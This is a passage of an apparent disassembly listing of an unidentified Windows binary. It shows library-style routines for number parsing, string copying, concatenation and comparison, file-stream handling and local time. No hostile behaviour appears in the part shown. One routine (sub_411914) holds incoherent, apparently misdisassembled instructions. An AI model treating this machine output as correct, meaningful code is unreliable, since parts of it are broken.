mov [ebp+var_4], esi
jnz short loc_411717
or [ebp+arg_C], 2
jmp short loc_41171C
; ---------------------------------------------------------------------------
loc_411717: ; CODE XREF: sub_4116C1+4E�j
cmp bl, 2Bh
jnz short loc_411722
loc_41171C: ; CODE XREF: sub_4116C1+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_411722: ; CODE XREF: sub_4116C1+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_4118B9
cmp eax, 1
jz loc_4118B9
cmp eax, 24h
jg loc_4118B9
push 10h
test eax, eax
pop ecx
jnz short loc_41176A
cmp bl, 30h
jz short loc_411754
mov [ebp+arg_8], 0Ah
jmp short loc_411786
; ---------------------------------------------------------------------------
loc_411754: ; CODE XREF: sub_4116C1+88�j
mov al, [esi]
cmp al, 78h
jz short loc_411767
cmp al, 58h
jz short loc_411767
mov [ebp+arg_8], 8
jmp short loc_411786
; ---------------------------------------------------------------------------
loc_411767: ; CODE XREF: sub_4116C1+97�j
; sub_4116C1+9B�j
mov [ebp+arg_8], ecx
loc_41176A: ; CODE XREF: sub_4116C1+83�j
cmp [ebp+arg_8], ecx
jnz short loc_411786
cmp bl, 30h
jnz short loc_411786
mov al, [esi]
cmp al, 78h
jz short loc_41177E
cmp al, 58h
jnz short loc_411786
loc_41177E: ; CODE XREF: sub_4116C1+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_411786: ; CODE XREF: sub_4116C1+91�j
; sub_4116C1+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_411796: ; CODE XREF: sub_4116C1+16C�j
cmp ds:dword_42E39C, 1
movzx esi, bl
jle short loc_4117AE
push 4
push esi
call sub_413446
pop ecx
pop ecx
jmp short loc_4117B9
; ---------------------------------------------------------------------------
loc_4117AE: ; CODE XREF: sub_4116C1+DF�j
mov eax, ds:dword_42E190
mov al, [eax+esi*2]
and eax, 4
loc_4117B9: ; CODE XREF: sub_4116C1+EB�j
test eax, eax
jz short loc_4117C5
movsx ecx, bl
sub ecx, 30h
jmp short loc_4117F7
; ---------------------------------------------------------------------------
loc_4117C5: ; CODE XREF: sub_4116C1+FA�j
cmp ds:dword_42E39C, 1
jle short loc_4117D9
push edi
push esi
call sub_413446
pop ecx
pop ecx
jmp short loc_4117E4
; ---------------------------------------------------------------------------
loc_4117D9: ; CODE XREF: sub_4116C1+10B�j
mov eax, ds:dword_42E190
mov ax, [eax+esi*2]
and eax, edi
loc_4117E4: ; CODE XREF: sub_4116C1+116�j
test eax, eax
jz short loc_411832
movsx eax, bl
push eax
call sub_4156C1
pop ecx
mov ecx, eax
sub ecx, 37h
loc_4117F7: ; CODE XREF: sub_4116C1+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_411832
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_41181C
jnz short loc_411816
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_41181C
loc_411816: ; CODE XREF: sub_4116C1+147�j
or [ebp+arg_C], 4
jmp short loc_411825
; ---------------------------------------------------------------------------
loc_41181C: ; CODE XREF: sub_4116C1+145�j
; sub_4116C1+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_411825: ; CODE XREF: sub_4116C1+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_411796
; ---------------------------------------------------------------------------
loc_411832: ; CODE XREF: sub_4116C1+125�j
; sub_4116C1+139�j
mov ecx, [ebp+arg_C]
dec [ebp+var_4]
mov edx, [ebp+arg_4]
test cl, 8
jnz short loc_411850
test edx, edx
jz short loc_41184A
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_41184A: ; CODE XREF: sub_4116C1+181�j
and [ebp+var_8], 0
jmp short loc_41189D
; ---------------------------------------------------------------------------
loc_411850: ; CODE XREF: sub_4116C1+17D�j
test cl, 4
mov eax, 7FFFFFFFh
jnz short loc_411876
test cl, 1
jnz short loc_41189D
and ecx, 2
jz short loc_41186D
cmp [ebp+var_8], 80000000h
ja short loc_411876
loc_41186D: ; CODE XREF: sub_4116C1+1A1�j
test ecx, ecx
jnz short loc_41189D
cmp [ebp+var_8], eax
jbe short loc_41189D
loc_411876: ; CODE XREF: sub_4116C1+197�j
; sub_4116C1+1AA�j
test byte ptr [ebp+arg_C], 1
mov ds:dword_45F844, 22h
jz short loc_41188C
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_41189D
; ---------------------------------------------------------------------------
loc_41188C: ; CODE XREF: sub_4116C1+1C3�j
mov ecx, [ebp+arg_C]
and cl, 2
neg cl
sbb ecx, ecx
neg ecx
add ecx, eax
mov [ebp+var_8], ecx
loc_41189D: ; CODE XREF: sub_4116C1+18D�j
; sub_4116C1+19C�j ...
test edx, edx
jz short loc_4118A6
mov eax, [ebp+var_4]
mov [edx], eax
loc_4118A6: ; CODE XREF: sub_4116C1+1DE�j
test byte ptr [ebp+arg_C], 2
jz short loc_4118B4
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_4118B4: ; CODE XREF: sub_4116C1+1E9�j
mov eax, [ebp+var_8]
jmp short loc_4118C4
; ---------------------------------------------------------------------------
loc_4118B9: ; CODE XREF: sub_4116C1+66�j
; sub_4116C1+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_4118C2
mov [eax], edi
loc_4118C2: ; CODE XREF: sub_4116C1+1FD�j
xor eax, eax
loc_4118C4: ; CODE XREF: sub_4116C1+1F6�j
pop edi
pop esi
pop ebx
leave
retn
sub_4116C1 endp
; =============== S U B R O U T I N E =======================================
sub_4118C9 proc near ; CODE XREF: sub_40318D+4BD�p
; seg000:0040C132�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_4116C1
add esp, 10h
retn
sub_4118C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4118E0 proc near ; CODE XREF: sub_40318D+266�p
; sub_40318D+46A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_14], 49h
push eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_410B60
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
push eax
call sub_41578D
add esp, 10h
leave
retn
sub_4118E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411914 proc near ; CODE XREF: sub_40318D+4E�p
var_CC = byte ptr -0CCh
var_32 = word ptr -32h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = dword ptr -16h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_A = byte ptr 12h
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+var_10]
push eax
call ds:dword_41C000 ; GetLocalTime
lea eax, [ebp+var_20]
push eax
call near ptr 3D0000h
mov dl, 66h
mov eax, [ebp+var_16]
cmp ax, ds:word_45F83A
jnz short loc_411979
mov ax, [ebp+var_18]
cmp ax, ds:word_45F838
jnz short loc_411979
mov ax, [ebp+var_1A]
cmp ax, ds:word_45F836
jnz short loc_411979
mov ax, [ebp+var_1E]
cmp ax, ds:word_45F832
jnz short loc_411979
mov ax, [ebp+var_20]
cmp ax, ds:word_45F830
jnz short loc_411979
mov eax, ds:dword_45F828
jmp short loc_4119BE
; ---------------------------------------------------------------------------
loc_411979: ; CODE XREF: sub_411914+28�j
; sub_411914+35�j ...
lea eax, [ebp+var_CC]
push eax
call near ptr 3D0000h
add al, 83h
clc
push dword ptr [ebx+ebx-7Dh]
clc
add dh, [ebp+arg_A]
cmp [ebp+var_32], 0
jz short loc_4119A2
cmp [ebp+var_24], 0
jz short loc_4119A2
push 1
pop eax
jmp short loc_4119A9
; ---------------------------------------------------------------------------
loc_4119A2: ; CODE XREF: sub_411914+81�j
; sub_411914+87�j
xor eax, eax
jmp short loc_4119A9
; ---------------------------------------------------------------------------
or eax, 0FFFFFFFFh
loc_4119A9: ; CODE XREF: sub_411914+8C�j
; sub_411914+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, offset word_45F830
movsd
movsd
movsd
movsd
pop edi
mov ds:dword_45F828, eax
pop esi
loc_4119BE: ; CODE XREF: sub_411914+63�j
push eax
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_10]
push eax
call sub_41623E
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_4119EE
mov [ecx], eax
locret_4119EE: ; CODE XREF: sub_411914+D6�j
leave
retn
sub_411914 endp
; =============== S U B R O U T I N E =======================================
sub_4119F0 proc near ; CODE XREF: sub_40380D+7C�p
; seg000:00408144�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
mov eax, [esi+0Ch]
test al, 40h
jz short loc_411A05
or eax, 0FFFFFFFFh
jmp short loc_411A3F
; ---------------------------------------------------------------------------
loc_411A05: ; CODE XREF: sub_4119F0+E�j
test al, 83h
jz short loc_411A3D
push esi
call sub_416419
push esi
mov edi, eax
call sub_4163B3
push dword ptr [esi+10h]
call sub_416300
add esp, 0Ch
test eax, eax
jge short loc_411A2B
or edi, 0FFFFFFFFh
jmp short loc_411A3D
; ---------------------------------------------------------------------------
loc_411A2B: ; CODE XREF: sub_4119F0+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_411A3D
push eax
call sub_410C83
and dword ptr [esi+1Ch], 0
pop ecx
loc_411A3D: ; CODE XREF: sub_4119F0+17�j
; sub_4119F0+39�j ...
mov eax, edi
loc_411A3F: ; CODE XREF: sub_4119F0+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_4119F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A46 proc near ; CODE XREF: sub_40380D+4E�p
; seg000:00408125�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov ecx, edi
test edi, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], ecx
jnz short loc_411A6A
xor eax, eax
jmp loc_411B13
; ---------------------------------------------------------------------------
loc_411A6A: ; CODE XREF: sub_411A46+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_411A7D
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_411A89
; ---------------------------------------------------------------------------
loc_411A7D: ; CODE XREF: sub_411A46+2D�j
mov [ebp+arg_C], 1000h
jmp short loc_411A89
; ---------------------------------------------------------------------------
loc_411A86: ; CODE XREF: sub_411A46+C4�j
mov ecx, [ebp+arg_0]
loc_411A89: ; CODE XREF: sub_411A46+35�j
; sub_411A46+3E�j
test word ptr [esi+0Ch], 10Ch
jz short loc_411ABB
mov eax, [esi+4]
test eax, eax
jz short loc_411ABB
cmp ecx, eax
mov edi, ecx
jb short loc_411AA0
mov edi, eax
loc_411AA0: ; CODE XREF: sub_411A46+56�j
push edi
push dword ptr [esi]
push ebx
call sub_4105F0
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_4]
jmp short loc_411B06
; ---------------------------------------------------------------------------
loc_411ABB: ; CODE XREF: sub_411A46+49�j
; sub_411A46+50�j
cmp ecx, [ebp+arg_C]
jb short loc_411AEE
cmp [ebp+arg_C], 0
mov eax, ecx
jz short loc_411AD1
xor edx, edx
div [ebp+arg_C]
mov eax, ecx
sub eax, edx
loc_411AD1: ; CODE XREF: sub_411A46+80�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_4165C4
add esp, 0Ch
test eax, eax
jz short loc_411B18
cmp eax, 0FFFFFFFFh
jz short loc_411B1E
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_411B06
; ---------------------------------------------------------------------------
loc_411AEE: ; CODE XREF: sub_411A46+78�j
push esi
call sub_4164EB
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_411B22
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+arg_C], eax
loc_411B06: ; CODE XREF: sub_411A46+73�j
; sub_411A46+A6�j
cmp [ebp+arg_0], 0
jnz loc_411A86
mov eax, [ebp+arg_8]
loc_411B13: ; CODE XREF: sub_411A46+1F�j
; sub_411A46+E6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_411B18: ; CODE XREF: sub_411A46+9A�j
or dword ptr [esi+0Ch], 10h
jmp short loc_411B22
; ---------------------------------------------------------------------------
loc_411B1E: ; CODE XREF: sub_411A46+9F�j
or dword ptr [esi+0Ch], 20h
loc_411B22: ; CODE XREF: sub_411A46+B2�j
; sub_411A46+D6�j
mov eax, edi
xor edx, edx
sub eax, [ebp+arg_0]
div [ebp+arg_4]
jmp short loc_411B13
sub_411A46 endp
; =============== S U B R O U T I N E =======================================
sub_411B2E proc near ; CODE XREF: sub_411B4E+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_41692A
test eax, eax
jnz short loc_411B38
retn
; ---------------------------------------------------------------------------
loc_411B38: ; CODE XREF: sub_411B2E+7�j
push eax
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_4167BA
add esp, 10h
retn
sub_411B2E endp
; =============== S U B R O U T I N E =======================================
sub_411B4E proc near ; CODE XREF: sub_40380D+2A�p
; seg000:00404AF6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_411B2E
add esp, 0Ch
retn
sub_411B4E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411B70 proc near ; CODE XREF: sub_4038A7+2BF�p
; sub_406C6E+75�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_411BE1
sub_411B70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411B80 proc near ; CODE XREF: seg000:00403FE1�p
; sub_406C6E+6E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_411B9C
loc_411B8D: ; CODE XREF: sub_411B80+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_411BCF
test ecx, 3
jnz short loc_411B8D
loc_411B9C: ; CODE XREF: sub_411B80+B�j
; sub_411B80+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_411B9C
mov eax, [ecx-4]
test al, al
jz short loc_411BDE
test ah, ah
jz short loc_411BD9
test eax, 0FF0000h
jz short loc_411BD4
test eax, 0FF000000h
jz short loc_411BCF
jmp short loc_411B9C
; ---------------------------------------------------------------------------
loc_411BCF: ; CODE XREF: sub_411B80+12�j
; sub_411B80+4B�j
lea edi, [ecx-1]
jmp short loc_411BE1
; ---------------------------------------------------------------------------
loc_411BD4: ; CODE XREF: sub_411B80+44�j
lea edi, [ecx-2]
jmp short loc_411BE1
; ---------------------------------------------------------------------------
loc_411BD9: ; CODE XREF: sub_411B80+3D�j
lea edi, [ecx-3]
jmp short loc_411BE1
; ---------------------------------------------------------------------------
loc_411BDE: ; CODE XREF: sub_411B80+39�j
lea edi, [ecx-4]
loc_411BE1: ; CODE XREF: sub_411B70+5�j
; sub_411B80+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_411C06
loc_411BED: ; CODE XREF: sub_411B80+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_411C58
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_411BED
jmp short loc_411C06
; ---------------------------------------------------------------------------
loc_411C01: ; CODE XREF: sub_411B80+9E�j
; sub_411B80+B8�j
mov [edi], edx
add edi, 4
loc_411C06: ; CODE XREF: sub_411B80+6B�j
; sub_411B80+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_411C01
test dl, dl
jz short loc_411C58
test dh, dh
jz short loc_411C4F
test edx, 0FF0000h
jz short loc_411C42
test edx, 0FF000000h
jz short loc_411C3A
jmp short loc_411C01
; ---------------------------------------------------------------------------
loc_411C3A: ; CODE XREF: sub_411B80+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_411C42: ; CODE XREF: sub_411B80+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_411C4F: ; CODE XREF: sub_411B80+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_411C58: ; CODE XREF: sub_411B80+72�j
; sub_411B80+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_411B80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411C60 proc near ; CODE XREF: sub_4038A7+2B2�p
; seg000:00403F85�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_411C79: ; CODE XREF: sub_411C60+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_411C79
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_411CA1
mov edx, ds:dword_45F840
loc_411CA1: ; CODE XREF: sub_411C60+39�j
; sub_411C60+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_411CC1
test al, al
jz short loc_411CC1
inc edx
jmp short loc_411CA1
; ---------------------------------------------------------------------------
loc_411CC1: ; CODE XREF: sub_411C60+58�j
; sub_411C60+5C�j
mov ebx, edx
loc_411CC3: ; CODE XREF: sub_411C60+81�j
mov al, [edx]
test al, al
jz short loc_411CE7
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_411CE3
inc edx
jmp short loc_411CC3
; ---------------------------------------------------------------------------
loc_411CE3: ; CODE XREF: sub_411C60+7E�j
and byte ptr [edx], 0
inc edx
loc_411CE7: ; CODE XREF: sub_411C60+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov ds:dword_45F840, edx
and eax, ebx
pop ebx
leave
retn
sub_411C60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411D00 proc near ; CODE XREF: sub_404134+1B4�p
; seg000:00405068�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_411D83
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_411D24
shr ecx, 2
jnz short loc_411D91
jmp short loc_411D45
; ---------------------------------------------------------------------------
loc_411D24: ; CODE XREF: sub_411D00+1B�j
; sub_411D00+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_411D52
test al, al
jz short loc_411D5A
test esi, 3
jnz short loc_411D24
mov ebx, ecx
shr ecx, 2
jnz short loc_411D91
loc_411D40: ; CODE XREF: sub_411D00+8F�j
and ebx, 3
jz short loc_411D52
loc_411D45: ; CODE XREF: sub_411D00+22�j
; sub_411D00+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_411D7E
dec ebx
jnz short loc_411D45
loc_411D52: ; CODE XREF: sub_411D00+2B�j
; sub_411D00+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_411D5A: ; CODE XREF: sub_411D00+2F�j
test edi, 3
jz short loc_411D74
loc_411D62: ; CODE XREF: sub_411D00+72�j
mov [edi], al
inc edi
dec ecx
jz loc_411DF6
test edi, 3
jnz short loc_411D62
loc_411D74: ; CODE XREF: sub_411D00+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_411DE7
loc_411D7B: ; CODE XREF: sub_411D00+7F�j
; sub_411D00+F4�j
mov [edi], al
inc edi
loc_411D7E: ; CODE XREF: sub_411D00+4D�j
dec ebx
jnz short loc_411D7B
pop ebx
pop esi
loc_411D83: ; CODE XREF: sub_411D00+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_411D89: ; CODE XREF: sub_411D00+A9�j
; sub_411D00+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_411D40
loc_411D91: ; CODE XREF: sub_411D00+20�j
; sub_411D00+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_411D89
test dl, dl
jz short loc_411DDB
test dh, dh
jz short loc_411DD1
test edx, 0FF0000h
jz short loc_411DC7
test edx, 0FF000000h
jnz short loc_411D89
mov [edi], edx
jmp short loc_411DDF
; ---------------------------------------------------------------------------
loc_411DC7: ; CODE XREF: sub_411D00+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_411DDF
; ---------------------------------------------------------------------------
loc_411DD1: ; CODE XREF: sub_411D00+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_411DDF
; ---------------------------------------------------------------------------
loc_411DDB: ; CODE XREF: sub_411D00+AD�j
xor edx, edx
mov [edi], edx
loc_411DDF: ; CODE XREF: sub_411D00+C5�j
; sub_411D00+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_411DF1
loc_411DE7: ; CODE XREF: sub_411D00+79�j
xor eax, eax
loc_411DE9: ; CODE XREF: sub_411D00+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_411DE9
loc_411DF1: ; CODE XREF: sub_411D00+E5�j
and ebx, 3
jnz short loc_411D7B
loc_411DF6: ; CODE XREF: sub_411D00+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_411D00 endp
; ---------------------------------------------------------------------------
push esi
mov esi, [esp+8]
push edi
mov eax, [esi+0Ch]
test al, 83h
jz short loc_411E7A
mov edi, [esp+14h]
test edi, edi
jz short loc_411E1D
cmp edi, 1
jz short loc_411E1D
cmp edi, 2
jnz short loc_411E7A
loc_411E1D: ; CODE XREF: seg000:00411E11�j
; seg000:00411E16�j
and al, 0EFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_411E34
push esi
call sub_416A3C
add [esp+14h], eax
pop ecx
xor edi, edi
loc_411E34: ; CODE XREF: seg000:00411E25�j
push esi
call sub_416419
mov eax, [esi+0Ch]
pop ecx
test al, 80h
jz short loc_411E49
and al, 0FCh
mov [esi+0Ch], eax
jmp short loc_411E5D
; ---------------------------------------------------------------------------
loc_411E49: ; CODE XREF: seg000:00411E40�j
test al, 1
jz short loc_411E5D
test al, 8
jz short loc_411E5D
test ah, 4
jnz short loc_411E5D
mov dword ptr [esi+18h], 200h
loc_411E5D: ; CODE XREF: seg000:00411E47�j
; seg000:00411E4B�j ...
push edi
push dword ptr [esp+14h]
push dword ptr [esi+10h]
call sub_4169A2
add esp, 0Ch
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_411E87
; ---------------------------------------------------------------------------
loc_411E7A: ; CODE XREF: seg000:00411E09�j
; seg000:00411E1B�j
mov ds:dword_45F844, 16h
or eax, 0FFFFFFFFh
loc_411E87: ; CODE XREF: seg000:00411E78�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411E90 proc near ; CODE XREF: seg000:00409B6A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_411EC1
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_411EBF
jz short loc_411EC1
dec ecx
dec ecx
loc_411EBF: ; CODE XREF: sub_411E90+29�j
not ecx
loc_411EC1: ; CODE XREF: sub_411E90+9�j
; sub_411E90+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_411E90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411ED0 proc near ; CODE XREF: sub_404EB9+5C�p
; sub_404EB9+9B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_411F84
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_411EFA
loc_411EEB: ; CODE XREF: sub_411ED0+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_411F2B
test edi, 3
jnz short loc_411EEB
loc_411EFA: ; CODE XREF: sub_411ED0+19�j
; sub_411ED0+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_411EFA
mov eax, [edi-4]
test al, al
jz short loc_411F38
test ah, ah
jz short loc_411F33
test eax, 0FF0000h
jz short loc_411F2E
test eax, 0FF000000h
jnz short loc_411EFA
loc_411F2B: ; CODE XREF: sub_411ED0+20�j
dec edi
jmp short loc_411F3B
; ---------------------------------------------------------------------------
loc_411F2E: ; CODE XREF: sub_411ED0+52�j
sub edi, 2
jmp short loc_411F3B
; ---------------------------------------------------------------------------
loc_411F33: ; CODE XREF: sub_411ED0+4B�j
sub edi, 3
jmp short loc_411F3B
; ---------------------------------------------------------------------------
loc_411F38: ; CODE XREF: sub_411ED0+47�j
sub edi, 4
loc_411F3B: ; CODE XREF: sub_411ED0+5C�j
; sub_411ED0+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_411F50
mov ebx, ecx
shr ecx, 2
jnz short loc_411F9C
jmp short loc_411F6C
; ---------------------------------------------------------------------------
loc_411F50: ; CODE XREF: sub_411ED0+75�j
; sub_411ED0+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_411F8A
mov [edi], dl
inc edi
dec ecx
jz short loc_411F80
test esi, 3
jnz short loc_411F50
mov ebx, ecx
shr ecx, 2
jnz short loc_411F9C
loc_411F6C: ; CODE XREF: sub_411ED0+7E�j
; sub_411ED0+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_411F80
loc_411F73: ; CODE XREF: sub_411ED0+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_411F82
dec ecx
jnz short loc_411F73
loc_411F80: ; CODE XREF: sub_411ED0+8B�j
; sub_411ED0+A1�j
mov [edi], cl
loc_411F82: ; CODE XREF: sub_411ED0+AB�j
pop ebx
pop esi
loc_411F84: ; CODE XREF: sub_411ED0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_411F8A: ; CODE XREF: sub_411ED0+85�j
; sub_411ED0+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_411F94: ; CODE XREF: sub_411ED0+E4�j
; sub_411ED0+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_411F6C
loc_411F9C: ; CODE XREF: sub_411ED0+7C�j
; sub_411ED0+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_411F94
test dl, dl
jz short loc_411F8A
test dh, dh
jz short loc_411FE8
test edx, 0FF0000h
jz short loc_411FD8
test edx, 0FF000000h
